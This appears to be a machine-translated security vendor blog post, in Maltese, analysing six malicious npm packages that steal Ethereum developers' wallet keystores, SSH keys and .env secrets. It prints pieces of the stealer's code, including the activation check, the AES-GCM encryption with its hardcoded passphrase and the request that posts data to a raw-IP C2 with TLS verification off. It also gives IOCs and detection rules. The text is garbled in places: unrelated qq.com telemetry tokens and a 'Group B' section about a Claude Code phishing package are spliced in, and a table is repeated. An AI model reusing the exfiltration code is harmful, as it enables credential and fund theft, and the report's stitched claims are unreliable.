Attakk ta' Typosquatting tal-EVMDeFi npm Jisraq Ċwievet tal-Iżviluppaturi

Attakk ta' Typosquatting tal-EVM/DeFi npm Jisraq Ċwievet tal-Iżviluppaturi

TL; DR

Fis-6 ta' Mejju 2026, pubblikatur wieħed tal-npm, namikazesarada010206, imbotta sitt pakketti malizzjużi li jimmiraw lejn l-ekosistema tal-iżviluppaturi Ethereum, Solidity, u DeFi.

Il-pakketti, viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils, u web3-utils-core, uża ismijiet plawżibbli ddisinjati biex jidhru bħal libreriji ta' għajnuna għal għodod popolari tal-Web3.

Is-sitt pakketti kollha kien fihom l-istess telemetry.js fajl. Il-fajl kien identiku għall-byte fil-cluster kollu, b'SHA-256:

SHA-256 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1

Il-malware ma jiġix esegwit fil-ħin tal-installazzjoni. M'hemm l-ebda preinstall or postinstall ganċ. Minflok, jattiva meta l-pakkett jiġi importat permezz ta' require().

Dak id-dettall huwa importanti.

L-impjant jistenna sakemm żviluppatur fil-fatt juża l-pakkett. Imbagħad jiċċekkja jekk il-workstation tidhirx bħal ambjent ta' żvilupp Ethereum / Solidity reali. Ifittex ċwievet Alchemy jew Infura, ċwievet privati, mnemoniċi, ċwievet tad-deployer, jew direttorju Foundry lokali.

Jekk il-host jaqbel, il-ħalliel jiġbor ċwievet privati ​​SSH, keystores tal-kartieri Foundry / Geth / Brownie, .env* fajls, u varjabbli ambjentali sensittivi. Jikkripta l-pakkett b'AES-256-GCM billi juża passphrase hardcoded u jesfiltrah għal endpoint IPv4 C2 mhux ipproċessat bil-verifika TLS diżattivata.

Is-sistema ta' Twissija Bikrija ta' Malware (MEW) ta' Xygeni kkonfermat is-sitt pakketti kollha bħala malizzjużi. Il-pakkett tar-rapport tat-tneħħija tar-reġistru npm għadu pendenti.

Il-Grupp: Sitt Pakketti, Pubblikatur Wieħed

Il-kont tal-pubblikatur namikazesarada010206 kien marbut mal-indirizz tal-Gmail mhux verifikat namikazesarada010206@gmail.com.

Il-kampanja dehret bħala pubblikazzjoni f'daqqa ta' ġurnata waħda fis-6 ta' Mejju 2026. Is-sitt pakketti kollha ġew verżjoniti bħala 1.0.0, ma kellu l-ebda dipendenza fuq ir-runtime, u bagħat biss tliet fajls:

package.json index.js telemetry.js

Huma ddikjaraw ukoll l-istess repożitorju tas-sors:

https://github.com/harunosakura030303-maker/evmchain-config

L-ewwel tliet pakketti nqabdu mill-iskanners tal-MEW fl-ewwel pubblikazzjoni. It-tlieta li fadal ġew immarkati bil-forza wara reviżjoni tal-analisti tal-profil npm tal-pubblikatur. Ladarba l-istess byte identiku telemetry.js ġie kkonfermat fil-klaster kollu, dawn ingħalqu bħala malizzjużi skont il-konsistenza.

Pakkett verżjoni npm Ippubblikat Biljett tal-MEW verdett
viem-core 1.0.0 2026-05-06 01:38:44Z #51049 Malicious
viem-utils-core 1.0.0 2026-05-06 #51050 Malicious
hardhat-core-utils 1.0.0 2026-05-06 #51051 Malicious
evm-utils 1.0.0 2026-05-06 #51069 Malizzjuż, bil-konsistenza
utilitajiet tal-funderija 1.0.0 2026-05-06 #51071 Malizzjuż, bil-konsistenza
web3-utils-core 1.0.0 2026-05-06 #51070 Malizzjuż, bil-konsistenza

L-istrateġija tal-għoti tal-ismijiet hija sempliċi iżda effettiva.

Dawn il-pakketti ma jimpersonifikawx ismijiet eżatti upstream. Minflok, jużaw suffissi ta' "utilità" plawżibbli bħal -core, -utils, u -utils-coreDan jagħmilhom jidhru bħal libreriji sħab li żviluppatur jista' jistenna li jara ħdejn l-għodda tal-Web3.

Pakkett Malizzjuż Mira Leġittima
viem-core viem, klijent popolari ta' Ethereum TypeScript
viem-utils-core ħajja
hardhat-core-utils hardhat, ambjent ta' żvilupp mainstream ta' Solidity
evm-utils Spazju tal-ismijiet tal-għodda ġenerika tal-EVM
utilitajiet tal-funderija funderija, katina ta' għodda tas-Solidità
web3-utils-core web3-utils, assistenti tal-Web3.js

Dan huwa l-mudell tal-“pakkett supplimentari”: mhux “Jiena l-pakkett reali,” iżda “Nidher qisni għajnuna raġonevoli madwar il-pakkett reali.”

Għall-iżviluppaturi tad-DeFi li qed jimxu malajr, dan huwa biżżejjed biex joħloq riskju.

X'jiġri Meta l-Pakkett Jiġi Importat

Il-katina tal-attakk hija żgħira, intenzjonata, u ffukata fuq ambjenti ta' żvilupp kriptografiku.

M'hemm l-ebda ganċ għall-installazzjoni. Minflok, kull pakkett jinkludi index.js li jesporta l-funzjonalità tal-stub u mbagħad jgħabbi l-modulu tat-telemetrija malizzjuża.

require('./telemetry').init();

Dan ifisser li l-malware jiġi attivat mal-ewwel importazzjoni.

Dan huwa operazzjonalment utli għall-attakkant. Ħafna skanners u sandboxes jiffokaw fuq l-imġiba fil-ħin tal-installazzjoni. Dan il-pakkett jistenna sakemm fil-fatt jintuża minn żviluppatur, skript tal-bini, suite tat-test, jew mogħdija tar-runtime.

Bieb tal-Attivazzjoni: Ixgħel biss fuq Stazzjonijiet tax-Xogħol tal-Iżviluppaturi tal-Web3 Reali

L-aktar parti importanti tal-impjant hija l-bieb tal-attivazzjoni.

Il-malware jivverifika l-varjabbli tal-ambjent li jinstabu komunement fuq magni tal-iżviluppaturi Ethereum / Solidity:

const indicators = [   process.env.ALCHEMY_API_KEY,   process.env.INFURA_KEY,   process.env.PRIVATE_KEY,   process.env.MNEMONIC,   process.env.DEPLOYER_KEY, ].filter(Boolean);

Jiċċekkja wkoll jekk Foundry jidhirx li hu installat:

fs.existsSync(path.join(os.homedir(), '.foundry'))

Jekk l-ebda kundizzjoni ma tkun vera, il-funzjoni tirritorna u ma tagħmel xejn.

Dan jagħmel il-pakkett aktar kwiet f'ambjenti ta' analiżi ġenerika. Sandbox mingħajr Foundry, ċwievet Alchemy, ċwievet Infura, ċwievet privati, jew mnemoniċi jista' jara importazzjoni li tidher li ma tagħmilx ħsara.

Fuq host li jaqbel, il-malware jistenna minn 60 sa 90 sekonda qabel ma jinġabar:

setTimeout(() => { try { _collect(); } catch {} },           60000 + Math.random() * 30000).unref();

Id-dewmien inaqqas il-korrelazzjoni ovvja bejn l-importazzjoni u l-esfiltrazzjoni. .unref() Is-sejħa tħalli wkoll lill-proċess ospitanti joħroġ normalment jekk il-pakkett ikun ġie importat fi skript ta' żmien qasir.

Din mhix imġiba storbjuża ta' smash-and-grab. Huwa stealer immirat iddisinjat biex jevita li jaħdem sakemm l-ambjent tal-iżviluppatur ma jkunx ta' min jisraq minnu.

Dak li Jiġbor il-Ħalliel

Ladarba jgħaddi l-bieb tal-attivazzjoni, il-malware jiġbor minn sorsi li huma l-aktar importanti fl-iżvilupp tal-Web3: ċwievet privati, keystores tal-kartieri, kredenzjali tal-iskjerament, sigrieti tal-cloud, tokens npm, u konfigurazzjoni lokali tal-proġett.

sors X'Jinġabar
proċess.ambjent Kwalunkwe varjabbli li taqbel /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i
~/.ssh/* Fajls li fihom PRIVATE KEY jew BEGIN OPENSSH, inkluż il-kontenut sħiħ tal-fajl
~/.foundry/keystores/* Fajls tal-maħżen taċ-ċwievet tal-kartiera tal-funderija
~/.ethereum/maħżen taċ-ċwievet/* Fajls tal-maħżen taċ-ċwievet tal-kartiera Geth
~/.brownie/kontijiet/* Fajls tal-maħżen taċ-ċwievet tal-kartiera Brownie
${cwd}/.env Kontenut sħiħ tal-fajl
${cwd}/.env.local Kontenut sħiħ tal-fajl
${cwd}/.env.produzzjoni Kontenut sħiħ tal-fajl
${cwd}/.env.development Kontenut sħiħ tal-fajl
os.isem tal-host() Metadata tal-ospitant
kripto.randomUUID() Identifikatur tal-vittma/sessjoni
Data.issa() Timbru tal-ħin tal-ġbir
otheve.beacon.qq.com oth.str.beacon.qq.com h.trace.qq.com

It-tokens tal-ATTA huma:

ATTA_ID 00400014144 ATTA_TOKEN 6478159937

Ma stajniex nikkonfermaw jekk it-telemetrija kinitx l-analitika tal-operatur stess jew kanal monetizzat separatament. It-tokens tal-ATTA huma l-istess fiż-żewġ kampjuni li eżaminajna.

Grupp B: heibai

claude.hk OAuth Phishing + ANTHROPIC_BASE_URL Hijack

Il-kampjun tal-1 ta' April huwa l-fergħa aktar kruda u bikrija tal-kampanja.

heibai:2.1.88-claude.hk-4 ġie ppubblikat minn wuguoqiangvip28, kont maħluq fis-7 ta' Ġunju 2025. Il-pakkett ivverżjoni ruħu espliċitament kontra l-kodiċi leġittimu 2.1.88 Rilaxx antropoġiku.

Ma jinkwetax dwar CA-cert MITM. Minflok, jigdeb lill-utent dwar l-endpoint tal-OAuth.

Iż-żidiet malizzjużi fuq is-sors tal-Kodiċi Claude li nxtered jinkludu:

sors X'Jinġabar
proċess.ambjent Kwalunkwe varjabbli li taqbel /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i
~/.ssh/* Fajls li fihom PRIVATE KEY jew BEGIN OPENSSH, inkluż il-kontenut sħiħ tal-fajl
~/.foundry/keystores/* Fajls tal-maħżen taċ-ċwievet tal-kartiera tal-funderija
~/.ethereum/maħżen taċ-ċwievet/* Fajls tal-maħżen taċ-ċwievet tal-kartiera Geth
~/.brownie/kontijiet/* Fajls tal-maħżen taċ-ċwievet tal-kartiera Brownie
${cwd}/.env Kontenut sħiħ tal-fajl
${cwd}/.env.local Kontenut sħiħ tal-fajl
${cwd}/.env.produzzjoni Kontenut sħiħ tal-fajl
${cwd}/.env.development Kontenut sħiħ tal-fajl
os.isem tal-host() Metadata tal-ospitant
kripto.randomUUID() Identifikatur tal-vittma/sessjoni
Data.issa() Timbru tal-ħin tal-ġbir

Il-lista fil-mira hija speċifika ħafna. Dan mhuwiex serq ġeneriku tal-browser jew scraping wiesa' tal-kredenzjali. Hija mmirata lejn żviluppaturi li jibnu, jittestjaw, jużaw, jew joperaw applikazzjonijiet tal-Ethereum.

L-inklużjoni tal-keystores ta' Foundry, Geth, u Brownie hija speċjalment importanti. Dawn il-fajls jistgħu jirrappreżentaw aċċess dirett għal wallets jew identitajiet ta' skjerament. Jekk l-attakkant jista' jqabbadhom ma' passwords, mnemoniċi, jew sigrieti ambjentali, jista' jkun kapaċi jċaqlaq fondi, jimpersonifika lil min iħaddem, jew jikkomprometti operazzjonijiet ta' smart contract.

Kriptaġġ Qabel l-Esfiltrazzjoni

Il-malware jikkripta d-dejta miġbura qabel ma jibgħatha.

const key = crypto.createHash('sha256').update(K).digest(); const iv = crypto.randomBytes(12); const cipher = crypto.createCipheriv('aes-256-gcm', key, iv);

Il-frażi hardcoded hija:

a]3Fk9$mP2xL7vQ8nR4wJ6yB0tH5cE1d

Il-payload finali huwa mgeżwer bħala JSON:

{"v":2,"iv":"<base64>","d":"<base64-ciphertext>","t":"<base64-gcm-tag>"}

Il-kriptaġġ waħdu ma jagħmilx il-malware aktar avvanzat. Madankollu, jagħmel l-ispezzjoni tan-netwerk aktar diffiċli. Difensur li josserva l-ħruġ jara payload JSON, iżda mhux iċ-ċwievet misruqa, il-fajls tal-kartiera, jew .env kontenut mingħajr il-frażi passkodifikata u l-loġika tad-dekriptaġġ.

Esfiltrazzjoni għal IPv4 C2 mhux ipproċessat

Il-mogħdija tal-esfiltrazzjoni hija hardcoded:

const req = https.request({   hostname: '76.13.37.80', port: 8443,   path: '/api/v1/telemetry', method: 'POST',   headers: { 'Content-Type': 'application/json', ... },   rejectUnauthorized: false, timeout: 8000, }, () => {});

Il-malware jibgħat id-dejta lil:

https://76.13.37.80:8443/api/v1/telemetry

Żewġ dettalji jispikkaw.

L-ewwelnett, is-C2 huwa indirizz IPv4 mhux ipproċessat aktar milli dominju. Dan ineħħi l-ħtieġa għar-reġistrazzjoni tad-dominju u jevita xi skoperti bbażati fuq id-dominju.

It-tieni, il-verifika tat-TLS hija diżattivata b'dan li ġej:

rejectUnauthorized: false

Dan jippermetti lill-malware jaċċetta kwalunkwe ċertifikat, inklużi ċertifikati ffirmati minnu nnifsu. Fi kliem ieħor, l-attakkant jikseb trasport kriptat mingħajr ma jkollu bżonn ċertifikat pubbliku validu.

M'hemm l-ebda loġika ta' tentattiv mill-ġdid u l-ebda host ta' riżerva. L-iżbalji jinbelgħu fis-skiet. Dan iżomm il-pakkett kwiet jekk is-C2 ikun offline jew ma jintlaħaqx.

Għaliex Din il-Kampanja Tgħodd

Il-biċċa l-kbira tal-pakketti npm malizzjużi mmirati lejn l-iżviluppaturi jfittxu kredenzjali wesgħin: tokens npm, ċwievet AWS, tokens GitHub, jew .npmrc fajls.

Din il-kampanja tnaqqas il-mira.

Ifittex sinjali li l-magna tappartjeni lil żviluppatur ta' Ethereum jew Solidity. Imbagħad jiġbed eżattament l-assi li huma importanti f'dak l-ambjent: keystores tal-kartieri, ċwievet privati, mnemoniċi, ċwievet tad-deployer, .env fajls, u ċwievet SSH.

Dan jagħmel il-kampanja aktar perikoluża għat-timijiet tal-Web3 milli serq ġeneriku tal-npm.

Infezzjoni b'suċċess tista' tesponi:

  • Kartieri tal-iskjerament
  • Ċwievet tal-amministrazzjoni tal-kuntratt intelliġenti
  • Ċwievet tal-fornitur RPC
  • Kredenzjali tal-iskjerament tal-cloud
  • tokens tal-pubblikazzjoni npm
  • Aċċess SSH għall-iżviluppatur jew l-infrastruttura tal-bini
  • Sigrieti tal-proġett maħżuna fi .env fajls
  • Ħażniet taċ-ċwievet tal-kartieri għal Foundry, Geth, jew Brownie

L-ismijiet tal-pakketti juru wkoll inġinerija soċjali ċara. Huma jimmiraw lejn l-ekosistema tal-iżviluppaturi tal-Web3 permezz ta' ismijiet ta' għodod familjari: viem, hardhat, foundry, evm, u web3.

L-attur m'għandux għalfejn jikkomprometti l-proġetti reali. Jeħtieġ biss li żviluppatur jinstalla dak li jidher qisu pakkett raġonevoli li jakkumpanja.

Indikaturi ta' Kompromess u Sejbien

Pakketti u Pubblikatur
Qasam valur
pubblikatur tal-npm namikazesarada010206
Email tal-pubblikatur namikazesarada010206@gmail.com
Email verifikata Nru
SCM verifikata Nru
Punteġġ tar-reputazzjoni 1.0
Pakketti viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils, web3-utils-core
verżjonijiet Kollha 1.0.0
Repożitorju tas-sors https://github.com/harunosakura030303-maker/evmchain-config
Malizzjuż ikkonfermat Is-sitt pakketti kollha
Netwerk
tip valur
Punt tat-tmiem C2 https://76.13.37.80:8443/api/v1/telemetry
C2 IP 76.13.37.80
Port C2 8443/tcp
Imġieba tat-TLS irrifjutaMhux awtorizzat: falz
Skema tat-tagħbija {"v":2,"iv": "d": "t": }
Fajls u Hashes
tip valur
telemetrija.js SHA-256 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1
Tqassim tal-pakkett pakkett.json, index.js, telemetrija.js
Għadd ta' fajls 3
Daqs totali approssimattiv 3.4 KB

Sinjali ta' Attivazzjoni

Il-malware jivverifika dawn il-varjabbli tal-ambjent:

ALCHEMY_API_KEY INFURA_KEY PRIVATE_KEY MNEMONIC DEPLOYER_KEY

Jiċċekkja wkoll għal:

~/.foundry/

Mogħdijiet Ospitanti Mmirati

~/.ssh/* ~/.foundry/keystores/* ~/.ethereum/keystore/* ~/.brownie/accounts/* ${cwd}/.env ${cwd}/.env.local ${cwd}/.env.production ${cwd}/.env.development

Regex tal-Kollezzjoni

/TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i

Noti ta' Sejbien

Diversi regoli jaqbdu din il-kampanja mingħajr il-ħtieġa ta' analiżi sħiħa tal-imġiba.

L-ewwel, skennja l-lockfiles għas-sitt ismijiet ta' pakketti malizzjużi:

viem-core viem-utils-core hardhat-core-utils evm-utils foundry-utils web3-utils-core

Kwalunkwe partita fi package-lock.json, yarn.lock, pnpm-lock.yaml, Jew node_modules L-istorja għandha tiġi trattata bħala inċident serju.

It-tieni, immonitorja l-proċessi ta' Node.js li jaqraw il-mogħdijiet tal-keystore tal-kartiera:

~/.foundry/keystores/ ~/.ethereum/keystore/ ~/.brownie/accounts/

Dan rarament ikun imġiba leġittima għal pakkett importat bħala dipendenza ta' għajnuna. Huwa speċjalment suspettuż meta segwit minn attività tan-netwerk 'il barra.

It-tielet, imblokka jew agħti twissija dwar konnessjonijiet HTTPS għal:

76.13.37.80:8443

Speċjalment meta t-triq tat-talba tkun:

/api/v1/telemetry

Ir-raba', fittex pakketti npm li jikkombinaw dawn il-karatteristiċi:

  • Pubblikatur ġdid jew ta' reputazzjoni baxxa
  • Kont tal-Gmail mhux verifikat
  • Isem tal-pakkett li jmiss mal-Web3
  • L-ebda storja sinifikanti tar-repożitorju
  • Tqassim żgħir tal-pakkett
  • index.js li jgħabbi fajl tat-telemetrija jew tal-għajnuna
  • L-ebda dipendenza fuq ir-runtime
  • Ġabra ta' varjabbli ambjentali sensittivi
  • Aċċess għall-maħżen taċ-ċwievet tal-kartiera

Dan il-mudell huwa aktar utli minn IOC wieħed għaliex il-pakkett li jmiss jista' jibdel l-indirizz IP iżda jżomm l-istess loġika ta' mira.

Lista ta' Kontroll tar-Rispons ta' Kompromess

Jekk żviluppatur uża wieħed mis-sitt pakketti u l-ambjent tiegħu jaqbel mal-bieb tal-attivazzjoni, ittratta l-workstation bħala kompromessa.

Dan jinkludi magni b'Foundry installat, ċwievet Alchemy jew Infura fl-ambjent, ċwievet privati, mnemoniċi, jew ċwievet tad-deployer.

Rispons rakkomandat:

  • Skonnettja l-host min-netwerk.
  • Ippreserva node_modules, lockfiles, storja tax-shell, u logs rilevanti għall-forensika.
  • Dawwar kull par taċ-ċwievet SSH taħt ~/.ssh/.
  • Dawwar iċ-ċwievet tal-kartiera għal kull keystore taħt ~/.foundry, ~/.ethereum, u ~/.brownie.
  • Mexxi l-fondi għal kartieri ġodda.
  • Dawwar kull sigriet maħżun fi .env* fajls fir-repożitorji li fihom ħadem l-iżviluppatur.
  • Dawwar is-sigrieti tal-ambjent li jaqblu mar-regex tal-kollezzjoni, inklużi ċwievet tal-AWS, tokens npm, tokens tad-deployment, ċwievet tal-API, ċwievet privati, seeds, u mnemoniċi.
  • Awditja l-attività ta' cloud, npm, GitHub, fornitur RPC, u blockchain minn meta l-pakkett ġie installat għall-ewwel darba.
  • Erġa' agħmel immaġin tal-workstation qabel ma terġa' tużah.

Dak li għandhom jieħdu d-Difensuri

Din il-kampanja turi kif it-typosquatting tal-npm qed jevolvi madwar ekosistemi ta' żviluppaturi ta' valur għoli.

L-attur ma kellux bżonn persistenza. Ma kellhomx bżonn offuskazzjoni. Lanqas biss kellhom bżonn eżekuzzjoni fil-ħin tal-installazzjoni.

Minflok, huma straħu fuq tliet affarijiet:

  • Ismijiet plawżibbli tal-pakketti Web3
  • Attivazzjoni biss fuq magni reali tal-iżvilupp tal-kripto
  • Serq dirett tal-fajls u s-sigrieti li huma l-aktar importanti għall-iżviluppaturi tal-Ethereum

Dan jagħmilha faċli li tintilef il-kampanja f'skennjar wiesa' u perikoluża meta tinżel fl-ambjent it-tajjeb.

Għat-timijiet tal-Web3, il-lezzjoni hija ċara: ittratta l-ismijiet tad-dipendenzi bħala parti mill-mudell ta' theddid tiegħek. Pakkett li jidher qisu helper li ma jagħmilx ħsara xorta jista' jsir l-iqsar triq lejn kompromess tal-kartiera.

Irrapportat lir-reġistru npm. Se naġġornaw din il-kariga meta l-kont tal-pubblikatur u l-pakketti jitneħħew.

sca-tools-software-composition-analysis-tools
Prijoritizza, irranġa, u assigura r-riskji tas-softwer tiegħek
Ikseb il-Kont B'Xejn tiegħek.
Mhix meħtieġa karta ta 'kreditu.

Assigura l-Iżvilupp u l-Kunsinna tas-Softwer tiegħek

bis-Suite tal-Prodotti Xygeni